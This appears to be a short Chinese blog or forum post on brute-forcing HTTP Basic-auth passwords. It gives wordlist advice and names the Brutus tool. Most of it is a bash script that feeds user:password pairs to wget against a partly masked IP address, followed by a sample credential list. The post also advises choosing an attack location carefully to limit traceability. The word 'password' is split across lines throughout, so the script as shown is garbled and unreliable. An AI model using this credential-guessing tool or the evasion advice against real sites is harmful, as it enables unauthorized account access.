首先,你总得有像样的字典吧。去国外网站上下
wordlist吧,或者自己写个简单的程序来生成字典。如果不会写程序,呵呵呵呵,那就下载字典生成程序吧 。(不过网上下的
wordlist,或者用网上下的字典生成程序生成的字典,好像都不好用)
其次,你总得有工具来运用字典干活吧。可以从网上下载工具,比如大名鼎鼎的brutus。运行时的界面如下:
当然,也可以自己写工具。笔者就写了一个简单的脚本来干活:
#!/bin/bash
#
user_pass
word_file=/root/wget_cracker_user_pass
word while read user_pass
word ; do
user=$(user_pass
word#:}
pass
word=$(user_pass
word%:}
wget -q -t 2 -T 15 --http-user=$user --http-pass
word=$pass
word -http://219.136.x.x:8080/tool.asp
if [ $? -eq 0 ] ; then
echo "OK I got an pass
word: user: $user ; pass
word: $pass
word !"
exit 0
fi
done < $user_pass
word_file
exit 0
-bash-3.00# cat wget_cracker_user_pass
word abc:adeeffaf
deff:afkafsasf
guest:affaewf
guest:guest
guest:afdasf
再次,你应该清楚:暴力破解不是SYN攻击,IP 欺骗是不可能的,你的老巢在哪里,受害者一眼就能看出来。所以,好好选择“狙击地”吧。搞不好会吃官司的哦。
最后,本人进行HTTP验证暴力破解,只是验证自己保护的
web页面口令的强度,绝不会去给别人的网站添麻烦。切记
